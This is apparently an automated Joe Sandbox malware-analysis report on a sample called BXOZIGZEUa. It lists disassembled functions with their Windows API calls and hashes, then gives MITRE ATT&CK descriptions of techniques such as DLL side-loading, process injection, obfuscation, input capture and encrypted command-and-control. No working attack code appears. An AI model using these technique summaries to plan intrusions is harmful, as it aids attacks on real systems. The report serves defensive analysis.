Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$EmptyRect$Create$CompatibleObject
String ID: |ra
API String ID: 1351999187-2232812188
Opcode ID: 568d248b67333ed3354ec387a10529ecfef7e150119a221e57643f07d3851e74
Instruction ID: 2ab9c7b17014627e94b7db9a9acfb53e66f61983d33ff101fb7fbce6072e1b98
Opcode Fuzzy Hash: 568d248b67333ed3354ec387a10529ecfef7e150119a221e57643f07d3851e74
Instruction Fuzzy Hash: 3F31F5B4901B44CFC726DFA9C5946DABBE8BF18300F40491EE5AE87282CB706604CB11

Function 0055CCE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0055CD2E
SendMessageW.USER32(00000000,00000433,00000000,?), ref: 0055CD5B

Part of subcall function 004E8214: SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004E8239
Part of subcall function 004E8214: GetKeyState.USER32(00000001), ref: 004E824E

Strings

,, xrefs: 0055CD4D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$State_memset
String ID: ,
API String ID: 930327405-3772416878
Opcode ID: 9c11d92fb4b0271babefe6bc8c7b67620d9b6d528328fce20c730d333dc253f5
Instruction ID: 513a30851eaf24885cb3067d2270493cbb4a71b02159e96b849b1c0f7aace243
Opcode Fuzzy Hash: 9c11d92fb4b0271babefe6bc8c7b67620d9b6d528328fce20c730d333dc253f5
Instruction Fuzzy Hash: 5111AF71900388AFDB20EFA2C895B9ABFF4FF40715F20002FE945AA551D7B4E948CB54

Function 0050C8A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0050C8FC
SendMessageW.USER32(00000000,00000085,00000000,00000000), ref: 0050C934

Strings

c, xrefs: 0050C907

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageRectSendWindow
String ID: c
API String ID: 2814762282-2927717585
Opcode ID: b82c324761dc9a0b13d2b79d1de25a09e26900ba7718e0ed2754290b6c411c72
Instruction ID: 46fcf42110295dbeb84d23a4262c4c2c08d7452ed1f2d3ae911a282fd4dfe27c
Opcode Fuzzy Hash: b82c324761dc9a0b13d2b79d1de25a09e26900ba7718e0ed2754290b6c411c72
Instruction Fuzzy Hash: 1511A071A00209AFCF14ABA69C49DAFFFBAFFC9700B10011EF006A2291DE755A01DB65

Function 00510583 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 005105D1
ShowWindow.USER32(?,?), ref: 005105E7

Strings

`c, xrefs: 005105A4

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Show
String ID: `c
API String ID: 990937876-2598275076
Opcode ID: d35196e6da63d5d001301ca7e32b28bb0b0d8c2544993eb3e9ddbfaad98f39bc
Instruction ID: f53adfd035a02aec97fadf252ccff0afc0bc95f262de6ef775a49a59a0354021
Opcode Fuzzy Hash: d35196e6da63d5d001301ca7e32b28bb0b0d8c2544993eb3e9ddbfaad98f39bc
Instruction Fuzzy Hash: DD01D8332412115BFB105A298845FA67B9AFF90724F1A002AED09DB281DF7CECC1CEA4

Function 004DCCE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32(?,?), ref: 004DCD08
CopyRect.USER32(?,?), ref: 004DCD1A

Strings

(, xrefs: 004DCD01

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CopyInfoMonitorRect
String ID: (
API String ID: 2119610155-3887548279
Opcode ID: 8cca6aaf32baaca1b00555617f94b8cc8000aa45a1f0223dc5c80a1c70c313ff
Instruction ID: a48b696ce7ba1548370883f756bd2a4b6eab2fbb596eea231987b7beaad41bdf
Opcode Fuzzy Hash: 8cca6aaf32baaca1b00555617f94b8cc8000aa45a1f0223dc5c80a1c70c313ff
Instruction Fuzzy Hash: A911D371A0060AAFCB50CFA9C985D9EBBF5FB08300B50886AE45AE7710DB34F945CF64

Function 004EE769 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004E8C1E: GetModuleHandleW.KERNEL32(?,?,004EE796), ref: 004E8C2C
Part of subcall function 004E8C1E: LoadLibraryW.KERNEL32(?,?,004EE796), ref: 004E8C3C

GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004EE79C
_memset.LIBCMT ref: 004EE7B5

Strings

DllGetVersion, xrefs: 004EE796

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc_memset
String ID: DllGetVersion
API String ID: 3385804498-2861820592
Opcode ID: 2997cd22b235b1b5fabaa6fd8a6db35c40a131bc21494b8c3446a52d4adfa601
Instruction ID: d6e5bb7c7ac375cd545c17a012632a8248cbfbb93c0073f9585a1fe6940874ea
Opcode Fuzzy Hash: 2997cd22b235b1b5fabaa6fd8a6db35c40a131bc21494b8c3446a52d4adfa601
Instruction Fuzzy Hash: E5019E71A0021DABD700EBAAD885BAE7BF8AB04754F50012AFA05E7291EB74DC44C7A4

Function 004D9739 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 004D9761
PathFindExtensionW.SHLWAPI(?), ref: 004D9777

Part of subcall function 004D9583: GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 004D95C8
Part of subcall function 004D9583: _memset.LIBCMT ref: 004D95F4
Part of subcall function 004D9583: _wcstoul.LIBCMT ref: 004D963C
Part of subcall function 004D9583: _wcslen.LIBCMT ref: 004D965D
Part of subcall function 004D9583: GetUserDefaultUILanguage.KERNEL32 ref: 004D966D
Part of subcall function 004D9583: ConvertDefaultLocale.KERNEL32(?), ref: 004D9694
Part of subcall function 004D9583: ConvertDefaultLocale.KERNEL32(?), ref: 004D96A3
Part of subcall function 004D9583: GetSystemDefaultUILanguage.KERNEL32 ref: 004D96AC
Part of subcall function 004D9583: ConvertDefaultLocale.KERNEL32(?), ref: 004D96C8
Part of subcall function 004D9583: ConvertDefaultLocale.KERNEL32(?), ref: 004D96D7

Strings

%s%s.dll, xrefs: 004D9782

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Default$ConvertLocale$Language$AddressExtensionFileFindModuleNamePathProcSystemUser_memset_wcslen_wcstoul
String ID: %s%s.dll
API String ID: 1415830068-1649984862
Opcode ID: 5fb110d385413de1f9dfaa9c57a86219a00955feaeef0219459b04537c1a97bd
Instruction ID: 443a4b0b24180e14b7a3b079a361ea9272190bf5bbe8ea6fedd7b87ad6270b08
Opcode Fuzzy Hash: 5fb110d385413de1f9dfaa9c57a86219a00955feaeef0219459b04537c1a97bd
Instruction Fuzzy Hash: A401A272A00108ABCB01DFA8EC89DFF77E9EF49300F0004BAA509E7250EA749E45CB94

Function 005D636A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 005D637B
__invoke_watson.LIBCMT ref: 005D63CF

Part of subcall function 005D620A: _strcat_s.LIBCMT ref: 005D6229

Strings

-g], xrefs: 005D63BD

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: __invoke_watson_strcat_s_strcpy_s
String ID: -g]
API String ID: 312943863-4038253704
Opcode ID: 117d6c5dede76610d39dd324e0546458fefc940fb11ed62c4ca2333bbf63c885
Instruction ID: 112a4547dda903d3883708b928178f3badd20d4f62e1d65efcb13e3674124a14
Opcode Fuzzy Hash: 117d6c5dede76610d39dd324e0546458fefc940fb11ed62c4ca2333bbf63c885
Instruction Fuzzy Hash: D2F0C2B24403497FCF216E58CC06D9A3F1ABB40350F4A8463FA194A252E332CE65D750

Function 005A36E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005A36E8
GetProcAddress.KERNEL32(00000000,?), ref: 005A3721

Part of subcall function 004D94E4: ActivateActCtx.KERNEL32(?,?,0062BB48,00000010,004D95B9,KERNEL32.DLL), ref: 004D9504

Strings

UxTheme.dll, xrefs: 005A3701

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ActivateAddressH_prolog3Proc
String ID: UxTheme.dll
API String ID: 323876227-352951104
Opcode ID: 17b700ee36d2fa32ad7c5b6190c5de4d2b301f2401f70756fb763870fc1c9c2d
Instruction ID: c05894e57a508b06508ff6d96833bae8740d3acfe09318563b6b77dbb2176b6b
Opcode Fuzzy Hash: 17b700ee36d2fa32ad7c5b6190c5de4d2b301f2401f70756fb763870fc1c9c2d
Instruction Fuzzy Hash: 30E0EDB96043054FCB10AFB89D0AB2C3FD4FB02718F045008F800D72A0CB78DB808B04

Function 004E61F6 Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6230
InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6242
LeaveCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E624F
EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E625F

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 0656a1547aec08de0acf4e3cc630cda7bb4a81c362f944952c364c34daddf5ea
Instruction ID: c1555e8ba94d06414e142f729806f180815ef148f5b8c0ed7172170249bb2ccd
Opcode Fuzzy Hash: 0656a1547aec08de0acf4e3cc630cda7bb4a81c362f944952c364c34daddf5ea
Instruction Fuzzy Hash: 91F0FCB2900214AFCB146F56DC49725B75BEBF1796F021417F54043361DA3C9945CA69

Function 004E11C5 Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00643518,?,?,00000000,?,004E1699,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E11D3
TlsGetValue.KERNEL32(006434FC,?,?,00000000,?,004E1699,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E11E7
LeaveCriticalSection.KERNEL32(00643518,?,?,00000000,?,004E1699,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E11FD
LeaveCriticalSection.KERNEL32(00643518,?,?,00000000,?,004E1699,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E1208

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 28baf010b8a3b53257029994002e7313b14a349b74314f68f1aa587e785e67d9
Instruction ID: db99d36dd65c7ed2e61d7710941ebe0c91dc568b82f5bbc505ba2cd533e4f50d
Opcode Fuzzy Hash: 28baf010b8a3b53257029994002e7313b14a349b74314f68f1aa587e785e67d9
Instruction Fuzzy Hash: 6AF0B4322402049FCB208F56DC48C3B77A9EB957673194956F542E7231CA39F809DA54

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre
